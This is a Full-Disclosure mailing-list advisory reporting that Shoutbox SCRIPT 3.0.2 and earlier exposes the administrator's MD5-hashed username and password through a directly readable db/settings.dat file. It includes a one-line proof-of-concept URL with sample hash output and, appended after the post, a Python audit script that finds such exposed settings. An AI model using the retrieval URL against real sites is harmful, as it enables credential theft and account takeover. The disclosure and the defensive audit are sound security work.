[Full-disclosure] Shoutbox SCRIPT <= 3.0.2 Administrative MD5 Username and Password Retrieval

From: CorryL (corryl_at_sitoverde.com)
Date: 04/19/05

    To: <full-disclosure@lists.grok.org.uk>
    Date: Tue, 19 Apr 2005 23:16:14 +0200
    
    

    -=[--------------------ADVISORY-------------------]=-
    -=[                                                ]=-
    -=[ Shoutbox SCRIPT <= 3.0.2                       ]=-
    -=[                                                ]=-
    -=[ Author: CorryL www.x0n3-h4ck.org               ]=-
    -=[                                                ]=-
    -=[------------------------------------------------]=-

    -=[+] Application: Shoutbox SCRIPT
    -=[+] Version: 3.0.2 and prior
    -=[+] Vendor's URL: http://www.knusperleicht.at
    -=[+] Platform: Windows\Linux\Unix
    -=[+] Bug type: Administrative MD5 Username and Password Retrieval
    -=[+] Exploitation: Remote/Local
    -=[-]
    -=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~
    -=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck

    ..::[ Description ]::..

    Shoutbox is a very simple PHP script to use and to install,
    and is used as a showcase where users can leave their own
    messages.

    ..::[ Bug ]::..

    This software is affected by a bug:
    a remote attacker exploiting it
    can retrieve sensitive information such as the administrator
    username and password as MD5 hashes.

    ..::[ Proof Of Concept ]::..

    http://host/path to shout/db/settings.dat

    result:

    .....
    ....
    ....
    $SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
    $SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';

    ..::[ Workaround ]::..

    nothing

    ..::[ Disclosure Timeline ]::..

    [17/04/2005] - Vendor notification
    [19/04/2005] - No patch release from vendor
    [19/04/2005] - Public disclosure

    CorryL
    corryl80@gmail.com
    www.x0n3-h4ck.org
    Italian Security Team
    Fax (+39) 02700520894
    Tel (+39) 06452215277
    irc.xoned.net #x0n3-h4ck

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/
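
A defender-side audit for the exposure this advisory describes, added here as an example (it is not part of the original post or the vendor's code): it walks a document root and reports settings of the form `$NAME[key] = '<32 hex digits>'` stored in files the PHP handler does not execute. The function names, the sample tree and the assumption that only `.php` files are run by the interpreter are illustrative.

```python
import os
import re
import tempfile

# PHP-style assignment of a 32-hex-digit (MD5-sized) value, the format
# shown in the advisory's proof-of-concept output.
SECRET_RE = re.compile(r"\$(\w+)\[(\w+)\]\s*=\s*'([0-9a-fA-F]{32})'")

# Assumption: only these extensions are run by the PHP handler; any other
# file under the document root is returned to the client as static text.
EXECUTED_EXTS = {".php"}


def find_exposed_secrets(docroot, executed_exts=EXECUTED_EXTS):
    """Return sorted (relative_path, line_no, key) for hash-like settings in
    files served as static text. The hash values themselves are not returned."""
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if os.path.splitext(name)[1].lower() in executed_exts:
                continue  # executed server-side, source is not sent to clients
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, docroot).replace(os.sep, "/")
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    for line_no, line in enumerate(fh, 1):
                        for m in SECRET_RE.finditer(line):
                            findings.append((rel, line_no, f"{m.group(1)}[{m.group(2)}]"))
            except OSError:
                continue  # unreadable file: skip it rather than abort the audit
    return sorted(findings)


def build_sample_docroot(root):
    """Constructed sample tree: db/settings.dat plus a .php file with the same lines."""
    os.makedirs(os.path.join(root, "shout", "db"))
    body = ("$SB_ADMIN[Change_Username] = '" + "a" * 32 + "';\n"
            "$SB_ADMIN[Change_Userpass] = '" + "b" * 32 + "';\n")
    with open(os.path.join(root, "shout", "db", "settings.dat"), "w") as fh:
        fh.write("$SB_TITLE = 'demo';\n" + body)
    with open(os.path.join(root, "shout", "config.php"), "w") as fh:
        fh.write("<?php\n" + body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_docroot(tmp)
        for rel, line_no, key in find_exposed_secrets(tmp):
            print(f"{rel}:{line_no}: {key} is readable over HTTP unless access is denied")
```

Each finding is a candidate for moving the file outside the document root or denying direct requests to its directory in the web server configuration.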

